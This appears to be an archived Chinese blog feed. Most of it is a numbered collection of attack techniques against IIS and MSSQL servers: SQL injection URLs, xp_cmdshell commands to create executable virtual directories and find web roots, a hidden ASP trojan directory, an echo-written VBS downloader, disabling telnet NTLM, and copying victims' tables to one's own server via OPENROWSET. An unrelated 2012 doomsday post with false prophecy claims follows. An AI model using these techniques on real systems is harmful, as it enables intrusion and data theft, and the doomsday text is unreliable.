Regedit /L:system /R:user /E filename.reg Regpath
参数含义:
/L:system指定System.dat文件所在的路径。
/R:user指定User.dat文件所在的路径。
/E:此参数指定注册表编辑器要进行导出注册表操作,在此参数后面空一格,输入导出注册表的文件名。
Regpath:用来指定要导出哪个注册表的分支,如果不指定,则将导出全部注册表分支。在这些参数中,"/L:system"和"/R:user"参数是可选项,如果不使用这两个参数,注册表编辑器则认为是对WINDOWS目录下的"system.dat"和"user.dat"文件进行操作。如果是通过从软盘启动并进入DOS,那么就必须使用"/L"和"/R"参数来指定"system.dat"和"user.dat"文件的具体路径,否则注册表编辑器将无法找到它们。比如说,如果通过启动盘进入DOS,则备份注册表的命令是"Regedit /L:C:\windows\/R:C:\windows\/e regedit.reg",该命令的意思是把整个注册表备份到WINDOWS目录下,其文件名为"regedit.reg"。而如果输入的是"regedit /E D:\regedit.reg"这条命令,则是说把整个注册表备份到D盘的根目录下(省略了"/L"和"/R"参数),其文件名为"Regedit.reg"。regedit /s c:\adam.reg (导入c:\adam.reg文件至注册表)
regedit /e c:\web.reg (备份全部注册内容到c:\web.reg中)
针对win2000系统:C:\>regedit /e %windir%\help\iishelp\common\404b.htm "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"
然后http://目标IP/2.asp
针对win2003系统:没有找到,希望找到的朋友公布出来一起讨论。6)虚拟主机下%SystemRoot%\system32\inetsrv\MetaBack\下的文件是iis的备份文件,是允许web用户访问的,如果你的iis备份到这里,用webshell下载下来后用记事本打开,可以获取对应的域名和web绝对路径。
7)SQL注入建立虚拟目录,有dbo权限下找不到web绝对路径的一种解决办法:
我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:
? 建立虚拟目录win,指向c:\winnt\system32:exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
? 让win目录具有解析asp脚本权限:exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/win/Accessexecute "true" –s:'
? 删除虚拟目录win:exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/'
? 测试:http://127.0.0.1/win/test.asp
8)利用SQL语句来查找WEB目录:根据经验,猜疑WEB根目录的顺序是:d盘、e盘、c盘,首先我们建立一个临时表用于存放master..xp_dirtree(适合于public)生成的目录树,用以下语句:
;create table temp(dir nvarchar(255),depth varchar(255));--,该表的dir字段表示目录的名称,depth字段表示目录的深度。然后执行xp_dirtree获得D盘的目录树,语句如下:
;insert temp(dir,depth) exec master.dbo.xp_dirtree 'd:';-- 在进行下面的操作前,先查看D盘有几个文件夹,这样对D盘有个大致的了解,语句如下:
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷'))>=数字(数字=0、1、2、3...) 接着,我们在对方的网站上找几个一级子目录,如user、photo,然后,用筛选的方法来判断WEB根目录上是否存在此盘上,语句如下:
and (select count(*) from temp where dir<>'user')<(select count(*) from temp) 看语句的返回结果,如果为真,表示WEB根目录有可能在此盘上,为了进一步确认,多测试几个子目录:
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp) ...
如果所有的测试结果都为真,表示WEB根目录很有可能在此盘上。
下面假设找到的WEB根目录在此盘上,用以下的语句来获得一级子目录的深度:
and (select depth from temp where dir='user')>=数字(数字=1、2、3...) 假设得到的depth是3,说明user目录是D盘的3级目录,则WEB根目录是D盘的二级目录。
目前我们已经知道了根目录所在的盘符和深度,要找到根目录的具体位置,我们来从D盘根目录开始逐一搜寻,当然,没有必要知道每个目录的名称,否则太耗费时间了。
接下来,另外建立一个临时表,用来存放D盘的1级子目录下的所有目录,语句如下:
;create table temp1(dir nvarchar(255),depth varchar(255));--
然后把从D盘的第一个子目录下的所有目录存到temp1中,语句如下:
declare @dirname varchar(255);set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷') order by dir desc)T order by dir);insert into temp1 exec master.dbo.xp_dirtree @dirname
当然也可以把D盘的第二个子目录下的所有目录存到temp1中,只需把第二个top 1改为top 2就行了。 现在,temp1中已经保存了所有D盘第一级子目录下的所有目录,然后,我们用同样的方法来判断根目录是否在此一级子目录下:
and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)
如果返回为真,表示根目录可能在此子目录下,记住要多测试几个例子,如果都返回为假,则表明WEB根目录不在此目录下,然后我们在用同样的方法来获得D盘第2、3...个子目录下的所有目录列表,来判断WEB根目录是否在其下。但是,要注意,用xp_dirtree前一定要把temp1表中的内容删除。 现在假设,WEB根目录在D盘的第一级子目录下,该子目录名称为website,怎样获得这个目录的名称我想不用我说了吧。因为前面我们知道了WEB根目录的深度为2,我们需要知道website下到底哪个才是真正的WEB根目录。
现在,我们用同样的方法,再建立第3个临时表:
;create table temp2(dir nvarchar(255),depth varchar(255));-- 然后把从D盘的website下的所有目录存到temp2中,语句如下:
declare @dirname varchar(255);set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM 卷') order by dir desc)T order by dir);insert into temp2 exec master.dbo.xp_dirtree @dirname
当然也可以把D盘的website下第二个子目录下的所有目录存到temp2中,只需把第二个top 1改为top 2就行了。 现在,我们用同样的方法判断该目录是否为根目录:
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)
如果返回为真,为了确定我们的判断,多测试几个例子,方法上面都讲到了,如果多个例子都返回为真,那么就确定了该目录为WEB根目录。
用以上的方法基本上可以获得WEB根目录,现在我们假设WEB根目录是:D:\website\www
然后,我们就可以备份当前数据库到这个目录下用来下载。备份前我们把temp、temp1、temp2的内容清空,然后C、D、E盘的目录树分别存到temp、temp1、temp2中。 下载完数据库后要记得把三个临时表drop掉,现在我们在下载的数据库中可以找到所有的目录列表,包括后台管理的目录以及更多信息。
21、win2000下将WEB用户提升为系统用户权限,需要有管理员的权限才能执行:
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\windows\system32\idq.dll" "C:\windows\system32\inetsrv\httpext.dll" "C:\windows\system32\inetsrv\httpodbc.dll" "C:\windows\system32\inetsrv\ssinc.dll" "C:\windows\system32\msw3prt.dll" "C:\windows\system32\inetsrv\asp.dll"
查看是否成功:
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps Microsoft (R) Windows Script Host Version 5.6
版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。
inprocessisapiapps : (LIST) (6 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
"c:\winnt\system32\inetsrv\asp.dll"22、如何隐藏ASP木马:
建立非标准目录:mkdir images..\
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通过web访问ASP木马:http://ip/images../news.asp?action=login
如何删除非标准目录:rmdir images..\ /s23、去掉tenlnet的ntlm认证:
;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'—24、用echo写入文件下载脚本iget.vbs:
(1)echo Set x= createObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >c:\iget.vbs(2)c:\>cscript iget.vbs http://127.0.0.1/asp/dbm6.asp dbm6.asp

25、手工建立IIS隐藏目录的方法:
? 查看本地虚拟目录列表:cscript.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root
? 新建一个kiss目录:mkdir c:\asp\kiss
? 建立kiss虚拟目录:cscript.exe c:\inetpub\AdminScripts\mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss"
? 为kiss目录加执行和写权限:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/kiss/accesswrite "true" -s:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:
? ?:Cscript c:\inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false
? 访问:http://127.0.0.1/kiss/test.asp26、使用openrowset()连回本地做测试:
select a.*
FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'select * FROM [dvbbs].[dbo].[dv_admin]') AS aselect * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'select * FROM [dvbbs].[dbo].[dv_admin]')27、获得主机名:
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
select @@servername28、获得数据库用户名:
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49 and user>0
select user29、普通用户获得WEBSHELL的方法之二:
? 打包:
EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'
解包,可以用于得到webshell:
? EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'
? 读任意文件内容,要求有master的dbo权限:
EXEC [master].[dbo].[xp_readerrorlog] 1,'c:\cmd.asp' 30、sa 权限下已知web路径直接备份数据库到web路径下
http://www.XXXX.com/FullStory.asp?id=1;backuup database 数据库名 to disk='c:\inetpub\wwwroot\save.db' 则把得到的数据内容全部备份到WEB目录下,再用HTTP把此文件下载(当然首选要知道WEB虚拟目录)。
? 遍历系统的目录结构,分析结果并发现WEB虚拟目录,先创建一个临时表:temp
http://www.XXXX.com/FullStory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
?  接下来:我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中:
http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;--
? 我们可以通过查询temp的内容来获得驱动器列表及相关信息或者利用xp_subdirs获得子目录列表,并存入temp表中:
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
? 我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中:
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 这样就可以成功的浏览到所有的目录(文件夹)列表
? 如果我们需要查看某个文件的内容,可以通过执行xp_cmdsell:;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
? 使用'bulk insert'语法可以将一个文本文件插入到一个临时表中。如:bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp' 浏览temp就可以看到index.asp文件的内容了!通过分析各种ASP文件,可以得到大量系统信息,WEB建设与管理信息,甚至可以得到SA帐号的连接密码。31、一些sql中的扩展存储的总结:
xp_availablemedia 显示系统上可用的盘符'C:\' xp_availablemedia
xp_enumgroups 列出当前系统的使用群组及其说明 xp_enumgroups
xp_enumdsn 列出系统上已经设置好的ODBC数据源名称 xp_enumdsn
xp_dirtree 显示某个目录下的子目录与文件架构 xp_dirtree 'C:\inetpub\wwwroot\'
xp_getfiledetails 获取某文件的相关属性 xp_getfiledetails 'C:\inetpub\wwwroot.asp'
dbp.xp_makecab 将目标计算机多个档案压缩到某个档案里所压缩的档案都可以接在参数的后面用豆号隔开 dbp.xp_makecab 'C:\lin.cab','evil',1,'C:\inetpub\mdb.asp'
xp_unpackcab 解压缩 xp_unpackcab 'C:\hackway.cab','C:\temp',1
xp_ntsec_enumdomains 列出服务器域名 xp_ntsec_enumdomains
xp_servicecontrol 停止或者启动某个服务 xp_servicecontrol 'stop','schedule'
xp_terminate_process 用pid来停止某个执行中的程序 xp_terminate_process 123
dbo.xp_subdirs 只列某个目录下的子目录 dbo.xp_subdirs 'C:\'32、
USE MASTER
GO
create proc sp_MSforeachObject
@objectType int=1,
@command1 nvarchar(2000),
@replacechar nchar(1) = N'?',
@command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null,
@whereand nvarchar(2000) = null,
@precommand nvarchar(2000) = null,
@postcommand nvarchar(2000) = null
as
/* This proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its
own result set */
/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* Preprocessor won't replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
/* Defined @isobject for save object type */
Declare @isobject varchar(256)
select @isobject= case @objectType when 1 then 'IsUserTable'
when 2 then 'IsView'
when 3 then 'IsTrigger'
when 4 then 'IsProcedure'
when 5 then 'IsDefault'
when 6 then 'IsForeignKey'
when 7 then 'IsScalarFunction'
when 8 then 'IsInlineFunction'
when 9 then 'IsPrimaryKey'
when 10 then 'IsExtendedProc'
when 11 then 'IsReplProc'
when 12 then 'IsRule'
end
/* create the select */
/* Use @isobject variable isstead of IsUserTable string */
EXEC(N'declare hCForEach cursor global for select ''['' + REPLACE(user_name(uid), N'']'', N'']]'') + '']'' + ''.'' + ''['' +
REPLACE(object_name(id), N'']'', N'']]'') + '']'' from dbo.sysobjects o '
+ N' where OBJECTPROPERTY(o.id, [email=N'''+@isobject+''']N'''+@isobject+'''[/email]) = 1 '+N' and o.category & ' + @mscat + N' = 0 '
+ @whereand)
declare @retval int
select @retval = @@error
if (@retval = 0)
exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3
if (@retval = 0 and @postcommand is not null)
exec(@postcommand)
return @retval
GO
/*
1。获得所有的存储过程的脚本:
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=4
2。获得所有的视图的脚本:
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=2EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=1
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=3
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=4
*/33、DB_OWNER权限下的数据库备份方法
用openrowset吧。反连到自己的数据库机器,~先在本地建个跟目标机器一样结构的表~字段类型使用nvarchar.然后用海洋连接对方的SQL数据库,在查询分析那里执行
insert into OPENROWSET ('sqloledb','server=你数据库服务器的IP;uid=user;pwd=pass;database=dbname;','select * from 你建立的表) select * from 对方的表—
要是数据量太大的话就看看他数据库里有没有自动编号的字段.select * from 表名 where id>100
这样来弄吧
要是和WEB同台的话,直接将库BAK到WEB目录下回来就OK啦。。。不过前提库不能太大,超过2G的话SQL就超时了
如果是SA权限可以利用下面的两个ASP程序来备份数据库:sqlbackup1.asp
<HTML>
<HEAD>
<TITLE>SQL Server 数据库的备份与恢复</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY>
<form method="post" name=myform>
选择操作:<INPUT TYPE="radio" NAME="act" id="act_backup" value="backup"><label for=act_backup>备份</label> 
<INPUT TYPE="radio" NAME="act" id="act_restore" value="restore"><label for=act_restore>恢复</label>
<br>数据库名:<INPUT TYPE="text" NAME="databasename" value="<%=request("databasename")%>">
<br>文件路径:<INPUT TYPE="text" NAME="bak_file" value="c:\1.exe">(备份或恢复的文件路径,备份成EXE主要为了方便下载,活活..)<br>
<input type="submit" value="确定">
</form>
<%
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = "localhost" 'sql服务器
sqlname = "sa" '用户名
sqlpassword = "数据库密码" '密码
sqlLoginTimeout = 15 '登陆超时
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "input database name"
else
if act = "backup" then
Set srv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.createObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
Response.write "<font color=green>备份成功!</font>"
elseif act = "restore" then
'恢复时要在没有使用数据库时进行!
Set srv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.createObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srvResponse.write "<font color=green>恢复成功!</font>"
else
Response.write "<font color=red>没有选择操作</font>"
end if
end if
%>
</BODY>
</HTML>sqlbackup2.asp
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>采飞扬ASP备份MSSQL数据库程序 V1.0--QQ:79998575</title>
</head>
<style>
BODY { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; scrollbar-face-color:#E4E4F3; scrollbar-highlight-color:#FFFFFF; scrollbar-3dlight-color:#E4E4F3; scrollbar-darkshadow-color:#9C9CD3; scrollbar-shadow-color:#E4E4F3; scrollbar-arrow-color:#4444B3; scrollbar-track-color:#EFEFEF;}TABLE { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: none; border-bottom-style: none; border-left-style: solid; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}.tr { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; text-align: center;}.td { font-family: "Courier New"; font-size: 9pt; background-color: #f9f9fd;}.warningColor { font-family: "Courier New"; font-size: 9pt; color: #ff0000;}input {
font-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}textarea { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px; color: #000000;}.liuyes {
background-color: #CCCCFF;
}
A:link { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none;}tr { font-family: "Courier New"; font-size: 9pt; line-height: 18px;}td { font-family: "Courier New"; font-size: 9pt; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: none; border-right-style: solid; border-bottom-style: solid; border-left-style: none; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}.trHead { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; line-height: 3px;}.inputLogin { font-family: "Courier New"; font-size: 9pt; border: 1px solid #d8d8f0; background-color: #f9f9fd; vertical-align: bottom;}</style>
<body>
<form method="post" name="myform" action="?action=backupdatabase">
<table width="686" border="1" align="center">
<tr>
<td width="613" height="30" align="center" bgcolor="#330066"><font color="#FFFFFF">采飞扬ASP备份MSSQL数据库程序 V1.0 </font></td>
</tr>
<tr>
<td>选择操作:
<input type="radio" name="act" id="act_backup"value="backup" />
<label for=act_backup>备份</label>
<input type="radio" name="act" id="act_restore" value="restore" />
<label for=act_restore>恢复</label></td>
</tr>
<tr>
<td><label>SQL服务器:
<input type="text" name="sqlserver" value="localhost" />
</label></td>
</tr>
<tr>
<td><label>用户名:
<input name="sqlname" type="text" value="sa" />
密 码:
<input type="text" name="sqlpassword" />
</label></td>
</tr>
<tr>
<td><label>数据库名:
<input type="text" name="databasename" value="<%=request("databasename")%>" />
</label></td>
</tr>
<tr>
<td>文件路径:
<input name="bak_file" type="text" value="<% =server.MapPath("\")&"\"&"liuyes.bak"%>" size="60" />
(备份或恢复的文件路径)</td>
</tr>
<tr>
<td><% Response.write "本文件绝对路径:" %>
<font color="#FF0000">
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
</font></td>
</tr>
<tr>
<td><input name=submit1 type="submit" class="liuyes" id=submit1 size="10" value="确 定" />
<input name="Submit" type="reset" class="liuyes" size="10" value="重 置" /></td>
</tr>
</table>
</form>
<table width="686" border="1" align="center">
<tr>
<td>提示信息:<%
if request("action")="" then
response.write "<font color=#ff0000>不用我多说什么了吧!</font>"
end if
'SQL Server 数据库的备份与恢复!
if request("action")="backupdatabase" Then
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = trim(request("sqlserver"))
sqlname = trim(request("sqlname"))
sqlpassword =trim(request("sqlpassword"))
sqlLoginTimeout = 15
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "<font color=#ff0000>没有输入数据库名称!</font>"
else
if act = "backup" then
Set srv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.createObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Action = 0
bak.Initialize = 1
'bak.Replace = True
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
Response.write "<font color=green>备份成功!</font>"
elseif act="restore" then
'恢复时要在没有使用数据库时进行!
Set srv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.createObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srv
Response.write "<font color=green>恢复成功!</font>"
else
Response.write "<font color=red>请选择备份或恢复!</font>"
end if
end if
end if
%></td>
</tr>
</table>
</body>
</html> ]]> http://370567136.qzone.qq.com/blog/1251569128#comment 134218240 Sat, 29 Aug 2009 18:05:28 GMT http://370567136.qzone.qq.com/blog/1251569128 <![CDATA[视频: 一位父亲的感人独白 感动]]> http://370567136.qzone.qq.com/blog/1246874216 ]]> http://370567136.qzone.qq.com/blog/1246874216#comment 142615040 Mon, 06 Jul 2009 09:56:56 GMT http://370567136.qzone.qq.com/blog/1246874216 <![CDATA[2012年不可能那么巧]]> http://370567136.qzone.qq.com/blog/1238855828 关于2012年世界末日有以下几种说法。
1.水晶头骨之迷中讲到2012年12月21日太阳下山之后,世界变化,只有非洲和中国西部地区部分人存活
2.科学预测2012年地球磁极颠倒,前几次分别导致了冰川时代和大洪水等事件 (注意)
3.俄罗斯人预测2009年世界大战爆发,核危机 (注意)
4.台湾一个学龄前班的孩子突然说起古maya语,大概意思是说要净化地球,时间是2012年 (注意)
5.藏僧预言:2012年全球爆发核战神将显现干预 (注意)
6.2012年,太阳磁极也会颠倒 (注意)
7.星相上,2012年将出现大十字,土木相冲,日月相冲,这代表流血和死亡,上次十字发生在伊拉克战争
-
8.黄櫱禅师预测2012年台湾回归 (注意)
9.中国的推背图指2012年有难 (注意)
-
10.星相上,2012年5月5日从双鱼时代正式过度为水瓶时代,双鱼时代的特征是工业和科学技术发展,水瓶时代的特征是精神领域的提升
-
11.协波汇聚是说:在某个时间,成千上万的新时代人在世界各地的灵性地点(中心)聚会,引导和平降临地球、祈愿所有生命合一、冥想新时代来临。协波汇聚的重要日期是1987年12月31日,以及2012年的一个顶峰.
-
12.Amorah Quan Yin通灵预测洪水、地震、大陆板块移动、火山喷发、以及最终的两极变换,将会在2013年之前发生(注意)
-
13.:《圣经密码》指出,彗星将在那一年撞击地球;玛雅年历的注解显示宇宙末日将发生在2012年的12月21日.2012年让我们一起 迎接新的世界.新的人种.新的历史.
同时世界是一个多次元的空间,也许2012将不是以上这么进行着,一秒的时间存在着多个事实,是实是虚,我们拭目以待吧!
2012年是世界末日?
陆续出现了一些关于2012年的预言,难道这仅仅是一种巧合吗?
这里是我一些心得:
!我自己加的(注意), 是想大家可以记住,随着时间的推移,这些事情我们都能看到 到底是否发生了,如果真的出现巨变,我们心中就有数了。
我想纠正一个错误,而且我查过很多资料,2012年的确是地球最关键的一年,不是世界末日,是重生。我把一系列的时间串起了,2012年,经历过战火,台湾回归,中国崛起 推背图说是一个掌握军权的人带领着中国崛起,但是这个人不是中国人,被称为外来客。藏僧预言:2012年全球爆发核战神将显现干预,这里的战神是否是和带领中国崛起的人是一个人还是一类人?印度民族流传着战神,恰好是印度古核战遗迹那里出现的,战神从天而下,带来和平。加上协波汇聚这个仪式,绝对不是地球上任何一种仪式,那是心灵的牵引,通往精神世界的大门,大家都知道只有拥有极度发达的科技与极高的精神领域的文明才能办到的,说明有其他的文明会来地球帮助我们。为什么选择中国崛起?我想我们中国自古以为讲究以和为贵的和谐思想与外星文明的思想更接近。
从2008开始 每隔一段时间就会发生一系列灾难 08年 大家都看到了吧 09年也是灾难年 资料都显示 大规模瘟疫 洪水 大气反常 10 11年最明显 灾难 中日战争波及全球 导致核战。 如果这些事情没出现,就说明全是假的,如果出现了,请大家就祈祷吧,真的。
自求多福,不要去忙于奔波了,有意义吗?
-
-
以下是分析。
也许..大家可能不会相信.因为开始我也是这样的..但是.后来,我看了下相关资料.觉的有些奇怪...之前完全不相信的态度也有所改变..
了解历史的亲可能都知道消失的玛雅文明吧..玛雅人在一瞬间全部消失..谁也不知道他们去了哪里.至今,这仍是一个密团.但是.玛雅人留给我们太多的问题了...他们的预言百分之99都变成了现实..他们预测到了汽车,飞机的生产日期.有些亲可能会问.他们怎么会知道以后有一种东西叫做汽车..这也正是奇怪的地方.在埃及.一些玛雅文明研究者.在他们生活的地方和一些石头上发现了这些.他们预测了***出生和死亡的日期..完全一样....
人类历史上的3次大浩劫...其中一次就出现的玛雅人身上..即使他们预测到了也改变不了.....那一次..就是上面我所说的消失的玛雅文明.
依照玛雅历法,地球由始到终分为五个太阳纪,分别代表五次浩劫,其中四个浩劫已经过去
当第五个太阳纪来临,太阳会消失,大地剧烈摇晃,灾难四起,地球会彻底毁灭,按照马雅历法是三一一三年,换算为西历便是二○一二年十二月二十二日。
虽然很多民族都有末日预言,但为何玛雅人所说的末日预言,会受到人们的重视,原因是玛雅历法的计算,非常准确,从玛雅人的历法得知,他们早已知道地球公转时间,是三百六十五日又六小时又二十四分二十秒,误差非常之少。另外对於其他星体的运行时间,在计算上亦非常准确,对於数学上「○」的单位数字,早在三千年前,玛雅人已经使用
而且他们所绘制的航海图.比现在任何一个都要精确...
玛雅人说2012年12月21日的黑夜降临以后,12月22日的黎明永远不会到来...
而他们预测世界末日的毁灭方式是...人类自杀...剩下的人自相残杀....美国航天局和世界上一些著名的语言家都证实了玛雅的预言..
当然...这些并不绝对....只是有一点...玛雅人所说的2012年...地球将会发生重大的改变...这是肯定的...
-
玛雅太阳金字塔
接下来的更加恐怖:::
人类经过5次文明(我也不相信)
这五次文明是这样的:
一。根达亚文明,(超能力文明)1米左右,男人有第三只眼,翡翠色,功能各有不同。有预测的,有杀伤力的等等。。。女人没有第三只眼,所女人害怕男人。但是女人的子宫有能神的能力,女人怀孕前会与天上要投生的神联系,谈好了,女人才会要孩子。此文明毁于大陆沉没。
二。米索不达亚文明(饮食文明)这个文明是上个文明的逃亡者的延续。但是人们把以前的事忘却了,超能力也惭惭清失了。男的第三只眼开始清失。他们对饮食特别爱好,发展出各色各样的专家。这次文明在南极大陆,毁于地球磁极转换。
三。穆里亚文明(生物能文明)上个文明的逃亡者的延续,他们的先祖开始注意到植物在发芽时产生的能量,这个能量非常巨大,经过一个世纪的改良发明了利用植物能的机戒,这个机器可以放大能量,该文明毁于大陆沉没。
四。亚特兰缔斯文明(光的文明)继承上个文明,这里用继承,不用延续是因为,亚特兰缔斯来自猎户座的殖民者。他们拥有光的能力。
早在穆文明时期亚特兰就建立了。后来这两个文明还打核战争。
五。我们存在的文明 (情感的文明)会使用情感,于2012年12月冬至灭绝
-
展望新时代
